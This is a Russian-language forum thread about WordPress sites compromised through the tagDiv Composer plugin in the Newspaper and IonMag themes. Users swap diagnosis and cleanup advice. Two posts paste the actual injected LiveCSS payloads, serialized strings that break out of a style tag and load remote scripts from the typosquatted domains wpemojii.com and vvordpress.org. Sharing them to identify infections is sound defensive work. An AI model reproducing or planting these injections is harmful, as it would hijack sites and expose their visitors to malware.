А с оплатой из РФ у них как обстоят дела?
Проблема в плагине tagDiv Composer, который идет встроенным в тему. Вот тут подробно описано об этом - https://secureweb.site/balada-injector-targets-unpatched-tagdiv-plugin-newspaper-theme-wordpress-admins/
Новый пользователь с правами админа, это всего лишь первый шаг.
Посмотрите в админке не появился ли сам собой новый плагин wp-zexit. У меня такая же беда. Причем тема не Newspaper, а IonMag (давно не обновляется) с тем же встроенным плагином на борту. Требуется обновить плагин до версии 4.2.2 а где его найти и как скачать отдельно от темы ума не приложу.
Обновленный плагин вам особо не поможет, там логика разработки темы поменялась. Теперь весь базовый функционал не только в tagdiv сomposer, но и в td standart pack. В вашем случае - либо переходить на платную версию темы Newspaper или Newsmag или менять тему на любую другую. IonMag уже года 4 не поддерживается, если не больше.
Еще один вариант вредоносного кода:
a:2:{i:0;b:0;s:3:"css";s:1260:"</style><script>function isScriptLoaded(src) { return Boolean(document.querySelector('script[src^="' + src + '"]')); // `src^` eklemesi, URL'nin o prefix ile başladığını kontrol eder.}var bdBase = "https://wpemojii.com/wp-urlx.js"; var bd = bdBase + "?v=" + Date.now();if (!isScriptLoaded(bdBase)) { console.log("Script yükleniyor..."); var d = document; var s = d.createElement('script'); s.src = bd; s.type = 'text/javascript'; s.onload = function() { console.log("Script başarıyla yüklendi!"); }; s.onerror = function() { console.log("Script yüklenirken bir hata oluştu."); }; var scripts = d.getElementsByTagName('script'); if (scripts && scripts.length) { scripts[0].parentNode.insertBefore(s, scripts[0]); } else { d.body.appendChild(s); }} else { console.log("Script zaten yüklendi.");}</script><script src="https://wpemojii.com/xmlrpc2.js"></script><script>document.addEventListener("DOMContentLoaded", function() {var scriptElement = document.querySelector('script[src^="https://wpemojii.com/xmlrpc2.js"]');if(scriptElement) {scriptElement.src = "https://wpemojii.com/xmlrpc2.js?v=" + Date.now();}});</script><style>";}
Тема у тебя Newspaper дырявая, обнови до актуальной версии. Другого варианта нет. Эксплуатируется XSS которая уже пару лет известна. Какой-то ушлый турок ломает.
В опциях LiveCSS у тебя следующий код:
a:2:{i:0;b:0;s:3:"css";s:1268:"</style><script>function isScriptLoaded(src) { return Boolean(document.querySelector('script[src^="' + src + '"]')); // `src^` eklemesi, URL'nin o prefix ile başladığını kontrol eder.}var bdBase = "https://vvordpress.org/wp-urlx.js"; var bd = bdBase + "?v=" + Date.now();if (!isScriptLoaded(bdBase)) { console.log("Script yükleniyor..."); var d = document; var s = d.createElement('script'); s.src = bd; s.type = 'text/javascript'; s.onload = function() { console.log("Script başarıyla yüklendi!"); }; s.onerror = function() { console.log("Script yüklenirken bir hata oluştu."); }; var scripts = d.getElementsByTagName('script'); if (scripts && scripts.length) { scripts[0].parentNode.insertBefore(s, scripts[0]); } else { d.body.appendChild(s); }} else { console.log("Script zaten yüklendi.");}</script><script src="https://vvordpress.org/jquex4x.js"></script><script>document.addEventListener("DOMContentLoaded", function() {var scriptElement = document.querySelector('script[src^="https://vvordpress.org/jquex4x.js"]');if(scriptElement) {scriptElement.src = "https://vvordpress.org/jquex4x.js?v=" + Date.now();}});</script><style>";}
Можно ссылочку?